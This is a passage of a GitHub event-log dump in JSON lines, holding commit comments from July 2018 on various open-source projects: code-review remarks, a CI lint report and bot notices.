=$('#colorPicker').val();\r\n            $(event.target).css('background-color', paint);\r\n        });    \r\n    });\r\n});       "}},"created_at":"2018-07-05T08:42:25Z"}
{"id":"7921783690","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603217,"position":26,"line":26,"path":"ruby_module_8/wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:43:12Z","updated_at":"2018-07-05T08:43:12Z","author_association":"NONE","body":"Да и разве у тебя нет ридера на :place ?"}},"created_at":"2018-07-05T08:43:12Z"}
{"id":"7921785604","type":"CommitCommentEvent","actor":{"login":"andrei-ivanov"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":29603227,"position":null,"line":null,"path":null,"commit_id":"5b40dfca26b600973216523417562c1c09e53b7f","created_at":"2018-07-05T08:43:34Z","updated_at":"2018-07-05T08:43:34Z","author_association":"CONTRIBUTOR","body":"* perspective :)\r\n"}},"created_at":"2018-07-05T08:43:34Z"}
{"id":"7921788398","type":"CommitCommentEvent","actor":{"login":"ofaust90"},"repo":{"name":"LuzernWGProjects/Schurter"},"payload":{"comment":{"id":29603237,"position":null,"line":null,"path":null,"commit_id":"fa70c9726e3bca5152226ae32e65c209c88ea745","created_at":"2018-07-05T08:44:08Z","updated_at":"2018-07-05T08:44:08Z","author_association":"CONTRIBUTOR","body":"Never underestimate the power of plain old comments ;) "}},"created_at":"2018-07-05T08:44:08Z"}
{"id":"7921792187","type":"CommitCommentEvent","actor":{"login":"Moohialdin99"},"repo":{"name":"CanyonWind/HumanDetection"},"payload":{"comment":{"id":29603248,"position":null,"line":null,"path":null,"commit_id":"8e39c2fe4772a381afe56e7512d1008ece4259f8","created_at":"2018-07-05T08:44:50Z","updated_at":"2018-07-05T08:44:50Z","author_association":"NONE","body":"Thanks"}},"created_at":"2018-07-05T08:44:50Z"}
{"id":"7921792961","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29603252,"position":7,"line":5143,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/doc/XWikiDocument.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:44:59Z","updated_at":"2018-07-05T08:44:59Z","author_association":"MEMBER","body":"comment is no longer true :)"}},"created_at":"2018-07-05T08:44:59Z"}
{"id":"7921793304","type":"CommitCommentEvent","actor":{"login":"climu"},"repo":{"name":"climu/OSR-discord-bot"},"payload":{"comment":{"id":29603255,"position":16,"line":81,"path":"bot.py","commit_id":"aac3069f90116a727c97003609b71208b5df092e","created_at":"2018-07-05T08:45:03Z","updated_at":"2018-07-05T08:45:03Z","author_association":"OWNER","body":"Yea, otherwise the bot raise an error each time we someone call an unknown command.\r\n\r\nMaybe we could show a help message here instead."}},"created_at":"2018-07-05T08:45:03Z"}
{"id":"7921793467","type":"CommitCommentEvent","actor":{"login":"motss"},"repo":{"name":"kelektiv/node.bcrypt.js"},"payload":{"comment":{"id":29603258,"position":null,"line":null,"path":null,"commit_id":"a78d381b748b49ded79957a35c9d56be42f0fa57","created_at":"2018-07-05T08:45:05Z","updated_at":"2018-07-05T08:45:05Z","author_association":"NONE","body":"@agathver Fair enough. When can expect a release with this patch?"}},"created_at":"2018-07-05T08:45:05Z"}
{"id":"7921795403","type":"CommitCommentEvent","actor":{"login":"Jaifroid"},"repo":{"name":"kiwix/kiwix-js"},"payload":{"comment":{"id":29603267,"position":5,"line":196,"path":"www/js/lib/zimfile.js","commit_id":"adda5f9ba9b7dc73908103ff7bea384dc93515ed","created_at":"2018-07-05T08:45:26Z","updated_at":"2018-07-05T08:45:26Z","author_association":"COLLABORATOR","body":"@mossroy We don't need to delay reading if the slice is uncompressed (CompressionType 0 or 1). It doesn't actually use xzdec in that case, so it's not necessary to delay. I experimented with this a lot when I originally tried to insert my setTimeout code in these zimfile.js functions, and if you step through the processes here you'll see that xzdec is never invoked with the plainBlobReader. It does it all with the reading utility in util.js."}},"created_at":"2018-07-05T08:45:26Z"}
{"id":"7921797346","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29603271,"position":16,"line":5164,"path":"test/wrappers/ortools_test.rb","commit_id":"0d409b06a1e7e4516b465f9dd0d94ca73ff58ab0","created_at":"2018-07-05T08:45:46Z","updated_at":"2018-07-05T08:45:46Z","author_association":"COLLABORATOR","body":"to put in wrapper_test instead of ortiils"}},"created_at":"2018-07-05T08:45:46Z"}
{"id":"7921798436","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29603273,"position":8,"line":176,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:45:59Z","updated_at":"2018-07-05T08:45:59Z","author_association":"MEMBER","body":"It's better to have a hack in one place rather than in 15 places no?\r\n\r\nNot sure why it's a hack (haven't looked at the code and reasons for the IFs) but how would you fix it?"}},"created_at":"2018-07-05T08:45:59Z"}
{"id":"7921800016","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29603275,"position":65,"line":5213,"path":"test/wrappers/ortools_test.rb","commit_id":"0d409b06a1e7e4516b465f9dd0d94ca73ff58ab0","created_at":"2018-07-05T08:46:17Z","updated_at":"2018-07-05T08:46:17Z","author_association":"COLLABORATOR","body":"only test applicable solve for ortools too ?"}},"created_at":"2018-07-05T08:46:17Z"}
{"id":"7921803396","type":"CommitCommentEvent","actor":{"login":"linkavich14"},"repo":{"name":"LiuJiang682/reece"},"payload":{"comment":{"id":29603284,"position":null,"line":null,"path":null,"commit_id":"b70186701686d2febb28bf39c4ba78f235aed718","created_at":"2018-07-05T08:46:56Z","updated_at":"2018-07-05T08:46:56Z","author_association":"NONE","body":"Hi, I found your code and I got the exact challenge from Reece, what was the reason your code was rejected, for me it looks fine, could you please share with me your experience"}},"created_at":"2018-07-05T08:46:56Z"}
{"id":"7921805014","type":"CommitCommentEvent","actor":{"login":"JustPassingThrough"},"repo":{"name":"tronprotocol/wiki"},"payload":{"comment":{"id":29603287,"position":null,"line":null,"path":null,"commit_id":"7021a44673b57c789cc6f2ef45d98109987d408c","created_at":"2018-07-05T08:47:13Z","updated_at":"2018-07-05T08:47:13Z","author_association":"CONTRIBUTOR","body":"I sent you my details, thank you for giving back to the community."}},"created_at":"2018-07-05T08:47:13Z"}
{"id":"7921805195","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29603290,"position":null,"line":null,"path":null,"commit_id":"c88747dc3d00515b814b925cf95fcf24a0233017","created_at":"2018-07-05T08:47:15Z","updated_at":"2018-07-05T08:47:15Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/19/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T08:47:15Z"}
{"id":"7921806089","type":"CommitCommentEvent","actor":{"login":"lackac"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29603292,"position":99,"line":1120,"path":"lib/elixir/lib/code.ex","commit_id":"32450a0fd9db0a0a1e4f582b7a812aa3304f3fe8","created_at":"2018-07-05T08:47:25Z","updated_at":"2018-07-05T08:47:25Z","author_association":"CONTRIBUTOR","body":"Why are we not deprecating it now? The function in this form is of not much use and by deprecating it users will learn about how to fix its usage earlier."}},"created_at":"2018-07-05T08:47:25Z"}
{"id":"7921809891","type":"CommitCommentEvent","actor":{"login":"prudhomm"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29603296,"position":9,"line":186,"path":"contrib/ginac/ginac/CMakeLists.txt","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-05T08:48:08Z","updated_at":"2018-07-05T08:48:08Z","author_association":"MEMBER","body":"yes but I am not sure that we state that python is a requirement in the user manual, I have to check"}},"created_at":"2018-07-05T08:48:08Z"}
{"id":"7921811041","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29603298,"position":36,"line":429,"path":"wrappers/wrapper.rb","commit_id":"0d409b06a1e7e4516b465f9dd0d94ca73ff58ab0","created_at":"2018-07-05T08:48:21Z","updated_at":"2018-07-05T08:48:21Z","author_association":"COLLABORATOR","body":"use find instead of each ?"}},"created_at":"2018-07-05T08:48:21Z"}
{"id":"7921812109","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29603299,"position":9,"line":4439,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"42d0bbc8798bceffb8cac5214704a791fc295b94","created_at":"2018-07-05T08:48:32Z","updated_at":"2018-07-05T08:48:32Z","author_association":"MEMBER","body":"IMO, it'd be nice if  `boxType` accepted also a KotlinType (and TypeMapper? or should it be a method of type mapper?)\r\nto box inline classes automatically.\r\nBut probably, it's a huge change for now"}},"created_at":"2018-07-05T08:48:32Z"}
{"id":"7921815277","type":"CommitCommentEvent","actor":{"login":"bertfrees"},"repo":{"name":"sbsdev/pipeline"},"payload":{"comment":{"id":29603303,"position":6,"line":21,"path":".gitignore","commit_id":"6d6ee0b355098903744bd9b0e774dac8a810e49f","created_at":"2018-07-05T08:49:09Z","updated_at":"2018-07-05T08:49:09Z","author_association":"CONTRIBUTOR","body":"I'll remove them when syncing with master."}},"created_at":"2018-07-05T08:49:09Z"}
{"id":"7921818561","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29603305,"position":9,"line":4439,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"42d0bbc8798bceffb8cac5214704a791fc295b94","created_at":"2018-07-05T08:49:46Z","updated_at":"2018-07-05T08:49:46Z","author_association":"MEMBER","body":"Yes, it's an ideal solution. I'm thinking about this in background..."}},"created_at":"2018-07-05T08:49:46Z"}
{"id":"7921820044","type":"CommitCommentEvent","actor":{"login":"wolfs"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29603306,"position":2,"line":2,"path":".teamcity/Gradle_Util_Performance/buildTypes/Gradle_Util_Performance_PerformanceTestCoordinatorLinux.xml","commit_id":"85a4704ad4cd5f0493cc344b7feebbabd1dec94b","created_at":"2018-07-05T08:50:03Z","updated_at":"2018-07-05T08:50:03Z","author_association":"MEMBER","body":"@blindpirate I think those changes should not have been reverted. \r\n\r\nI.e. for existing `xml`s, the update was OK."}},"created_at":"2018-07-05T08:50:03Z"}
{"id":"7921821984","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29603308,"position":null,"line":null,"path":null,"commit_id":"78c2590ff5762f3dd5322e63b46ba2ce4c39cd15","created_at":"2018-07-05T08:50:24Z","updated_at":"2018-07-05T08:50:24Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-248](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-248).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-248-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-05T08:50:24Z"}
{"id":"7921829985","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603325,"position":37,"line":37,"path":"ruby_module_8/station.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:51:56Z","updated_at":"2018-07-05T08:51:56Z","author_association":"NONE","body":"А зачем ты смешал метод, который выводит информацию о поездах, вместе с итератором поездов на станции? Нам нужен метод each_train. Который будет передавать каждый поезд в блок по очереди. И повторюсь, что \"показывание\" это далеко не единственное возможное использование. Например\r\n```\r\nstation.show_train { |train| train.run_diagnostics }\r\n```\r\nВот мы передали блок, который делает диагностику каждому поезду. Подходит ли тут название show_train?"}},"created_at":"2018-07-05T08:51:56Z"}
{"id":"7921831528","type":"CommitCommentEvent","actor":{"login":"BigRoy"},"repo":{"name":"BigRoy/acre"},"payload":{"comment":{"id":29603330,"position":54,"line":259,"path":"acre/core.py","commit_id":"0d38e759fabb498f2d1ddee44be1b2ff5ecb83c3","created_at":"2018-07-05T08:52:14Z","updated_at":"2018-07-05T08:52:14Z","author_association":"OWNER","body":"Don't rename `which` to `locate` - unfortunately the name `which` comes from how Unix command prompts call the method that does exactly this. See: https://en.wikipedia.org/wiki/Which_(Unix)"}},"created_at":"2018-07-05T08:52:14Z"}
{"id":"7921831578","type":"CommitCommentEvent","actor":{"login":"Jaifroid"},"repo":{"name":"kiwix/kiwix-js"},"payload":{"comment":{"id":29603331,"position":12,"line":202,"path":"www/js/lib/zimfile.js","commit_id":"adda5f9ba9b7dc73908103ff7bea384dc93515ed","created_at":"2018-07-05T08:52:15Z","updated_at":"2018-07-05T08:52:15Z","author_association":"COLLABORATOR","body":"@mossroy Here I think we need to distinguish between a decompressor job that has been set to `{ readSlice: plainBlobReader }` and tha decompressor that has been set to `xz.Decompressor`. It's only the latter that needs to be delayed. It may be that this would be achieved by not using the SingleThread code above, but I'd need to step through the code to check. Otherwise I think we need to branch the code accordign to whether the compressionType is 4 (comrpessed) or not."}},"created_at":"2018-07-05T08:52:15Z"}
{"id":"7921834614","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29603334,"position":9,"line":4439,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"42d0bbc8798bceffb8cac5214704a791fc295b94","created_at":"2018-07-05T08:52:50Z","updated_at":"2018-07-05T08:52:50Z","author_association":"MEMBER","body":"BTW, I'm not sure it will work in case of reified type parameters.\r\ni.e., if you make just the same test but instead of `as` operator will use custom `checkcast` function like:\r\n```kotlin\r\ninline fun <reified T> checkcast(x: Any?) = x as T\r\n```"}},"created_at":"2018-07-05T08:52:50Z"}
{"id":"7921835300","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29603336,"position":138,"line":176,"path":"monopoly.py","commit_id":"db6e2c31482b851f811549075d929ece2e91a17d","created_at":"2018-07-05T08:52:58Z","updated_at":"2018-07-05T08:52:58Z","author_association":"NONE","body":"Good call moving this from HelperFunctions to Player."}},"created_at":"2018-07-05T08:52:58Z"}
{"id":"7921841601","type":"CommitCommentEvent","actor":{"login":"TwoTimesPI"},"repo":{"name":"TwoTimesPI/king"},"payload":{"comment":{"id":29603346,"position":null,"line":null,"path":null,"commit_id":"303cb5b524114d8d909e1d975c0131d5abcba26d","created_at":"2018-07-05T08:54:10Z","updated_at":"2018-07-05T08:54:10Z","author_association":"OWNER","body":"網路曾經是一個理想，但隨著參與者眾，竟無可避免地走向相同的命運：佔據大型討論區與高人氣部落格的意見，仍是以資料收集者佔絕大多數，分不清網路與雜志有什麼太大的不同．．．．． "}},"created_at":"2018-07-05T08:54:10Z"}
{"id":"7921844438","type":"CommitCommentEvent","actor":{"login":"guyemerson"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29603357,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-05T08:54:42Z","updated_at":"2018-07-05T08:54:42Z","author_association":"CONTRIBUTOR","body":"Well, thank you for writing that wiki page ;)"}},"created_at":"2018-07-05T08:54:42Z"}
{"id":"7921846159","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29603361,"position":151,"line":243,"path":"monopoly.py","commit_id":"db6e2c31482b851f811549075d929ece2e91a17d","created_at":"2018-07-05T08:55:02Z","updated_at":"2018-07-05T08:55:02Z","author_association":"NONE","body":"Later on, when you have defined all the possible `Property`s, you could generate this list by iterating over them and counting the number of properties for each color. Right now, there could very easily be a discrepancy if you miscounted one of these, or forgot to add a property."}},"created_at":"2018-07-05T08:55:02Z"}
{"id":"7921848933","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29603366,"position":null,"line":null,"path":null,"commit_id":"b890c718216d3babedf655f3ada32448fb451d1b","created_at":"2018-07-05T08:55:31Z","updated_at":"2018-07-05T08:55:31Z","author_association":"COLLABORATOR","body":"Puzzle `939-5d35582c` disappeared from [`src/main/java/com/zerocracy/radars/viber/TkViber.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/radars/viber/TkViber.java), that's why I closed #1070. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-05T08:55:31Z"}
{"id":"7921851079","type":"CommitCommentEvent","actor":{"login":"Stoephu"},"repo":{"name":"Stoephu/Food-Tinder"},"payload":{"comment":{"id":29603369,"position":null,"line":null,"path":null,"commit_id":"7b8f2839579571c6d56cebb9686e8234ac387ff4","created_at":"2018-07-05T08:55:55Z","updated_at":"2018-07-05T08:55:55Z","author_association":"OWNER","body":"Only for all values that are not too big"}},"created_at":"2018-07-05T08:55:55Z"}
{"id":"7921853602","type":"CommitCommentEvent","actor":{"login":"vigneshVH"},"repo":{"name":"Evolvus/evolvus-sandstorm-apis"},"payload":{"comment":{"id":29603374,"position":null,"line":null,"path":null,"commit_id":"37cd3f880da4726c3279e3efaf93a0e40de38227","created_at":"2018-07-05T08:56:24Z","updated_at":"2018-07-05T08:56:24Z","author_association":"NONE","body":"Test"}},"created_at":"2018-07-05T08:56:24Z"}
{"id":"7921854220","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29603376,"position":158,"line":250,"path":"monopoly.py","commit_id":"db6e2c31482b851f811549075d929ece2e91a17d","created_at":"2018-07-05T08:56:31Z","updated_at":"2018-07-05T08:56:31Z","author_association":"NONE","body":"It should be impossible for this to be less than `count`, right?"}},"created_at":"2018-07-05T08:56:31Z"}
{"id":"7921854857","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29603378,"position":71,"line":71,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-05T08:56:38Z","updated_at":"2018-07-05T08:56:38Z","author_association":"OWNER","body":"maybe this is what you already had in mind, but what about calling it qos_node_consumes and keep the CONSUMED_BY edge (swapping the parameters)?\r\nLike this: `consumes(x, Y)` ---> translated to an edge `Y CONSUMED_BY X`"}},"created_at":"2018-07-05T08:56:38Z"}
{"id":"7921857429","type":"CommitCommentEvent","actor":{"login":"han2015"},"repo":{"name":"bsed/captcha"},"payload":{"comment":{"id":29603383,"position":38,"line":38,"path":"redisStore.go","commit_id":"1e34c3cb8fb89ddd94099aaad80e9378e2cecb81","created_at":"2018-07-05T08:57:08Z","updated_at":"2018-07-05T08:57:08Z","author_association":"NONE","body":"这里为什么要加lock，redis的原子性操作不需要考虑并发情况？"}},"created_at":"2018-07-05T08:57:08Z"}
{"id":"7921858363","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29603384,"position":null,"line":null,"path":null,"commit_id":"6e27fb4ad87bb8a8128eac04b2f34bda6356c657","created_at":"2018-07-05T08:57:19Z","updated_at":"2018-07-05T08:57:19Z","author_association":"MEMBER","body":"Its why you should never rebuild a package without bump of pkgrel or version.\r\nThis is what happens, but I could also fix it on server instead of deleting.\r\n\r\nI will take care of the systemd depends that pifpaf pulls."}},"created_at":"2018-07-05T08:57:19Z"}
{"id":"7921860019","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29603387,"position":177,"line":269,"path":"monopoly.py","commit_id":"db6e2c31482b851f811549075d929ece2e91a17d","created_at":"2018-07-05T08:57:37Z","updated_at":"2018-07-05T08:57:37Z","author_association":"NONE","body":"This method is missing a return statement (for one branch)."}},"created_at":"2018-07-05T08:57:37Z"}
{"id":"7921862028","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"EDabrowskaRamm/warsawjs-workshop-20-flights-search"},"payload":{"comment":{"id":29603389,"position":null,"line":null,"path":null,"commit_id":"dfd83c2de1d5360bde6f8cb6c3e9607165581561","created_at":"2018-07-05T08:58:00Z","updated_at":"2018-07-05T08:58:00Z","author_association":"NONE","body":"To już nie taki `first commit` ;-)"}},"created_at":"2018-07-05T08:58:00Z"}
{"id":"7921863054","type":"CommitCommentEvent","actor":{"login":"Niall7459"},"repo":{"name":"savonet/liquidsoap"},"payload":{"comment":{"id":29603390,"position":null,"line":null,"path":null,"commit_id":"7333b2c6397c27f848f61e6afc75e1a5a68e6efa","created_at":"2018-07-05T08:58:12Z","updated_at":"2018-07-05T08:58:12Z","author_association":"NONE","body":"Is this an implemetation?"}},"created_at":"2018-07-05T08:58:12Z"}
{"id":"7921864002","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29603391,"position":178,"line":270,"path":"monopoly.py","commit_id":"db6e2c31482b851f811549075d929ece2e91a17d","created_at":"2018-07-05T08:58:23Z","updated_at":"2018-07-05T08:58:23Z","author_association":"NONE","body":"BOOLEANS.\r\n\r\nNever write: `if <some boolean expression>: return True`\r\n\r\nWrite: `return <some boolean expression>`"}},"created_at":"2018-07-05T08:58:23Z"}
{"id":"7921864189","type":"CommitCommentEvent","actor":{"login":"p3x-robot"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29603392,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-05T08:58:25Z","updated_at":"2018-07-05T08:58:25Z","author_association":"NONE","body":"@eduperez you are right, i built on the previous commit. sorry."}},"created_at":"2018-07-05T08:58:25Z"}
{"id":"7921866010","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29603395,"position":166,"line":258,"path":"monopoly.py","commit_id":"db6e2c31482b851f811549075d929ece2e91a17d","created_at":"2018-07-05T08:58:44Z","updated_at":"2018-07-05T08:58:44Z","author_association":"NONE","body":"Unused?"}},"created_at":"2018-07-05T08:58:44Z"}
{"id":"7921869446","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29603402,"position":null,"line":null,"path":null,"commit_id":"6e3a2197f8a3db005bd3388709d547d82c20ac80","created_at":"2018-07-05T08:59:21Z","updated_at":"2018-07-05T08:59:21Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/local-dates-displaying-incorrectly/91597/4\n"}},"created_at":"2018-07-05T08:59:21Z"}
{"id":"7921875462","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"purcell/emacs.d"},"payload":{"comment":{"id":29603422,"position":null,"line":null,"path":null,"commit_id":"a1cfcc1a7dc043453f3ce08a5618649a62f3664c","created_at":"2018-07-05T09:00:24Z","updated_at":"2018-07-05T09:00:24Z","author_association":"NONE","body":"Fantastic. Thanks Steve."}},"created_at":"2018-07-05T09:00:24Z"}
{"id":"7921876346","type":"CommitCommentEvent","actor":{"login":"NigeWarren"},"repo":{"name":"ZinkDigital/boson"},"payload":{"comment":{"id":29603425,"position":4,"line":9,"path":"boson-core/src/main/scala/io/zink/boson/bson/bsonImpl/BosonImpl.scala","commit_id":"e84e1c49418bec11025e60c7122f12e8431e7ac6","created_at":"2018-07-05T09:00:33Z","updated_at":"2018-07-05T09:00:33Z","author_association":"CONTRIBUTOR","body":"@MrLucasFischer Looks like CodecJson should naturally be in - io.zink.boson.json.codec.impl ???"}},"created_at":"2018-07-05T09:00:33Z"}
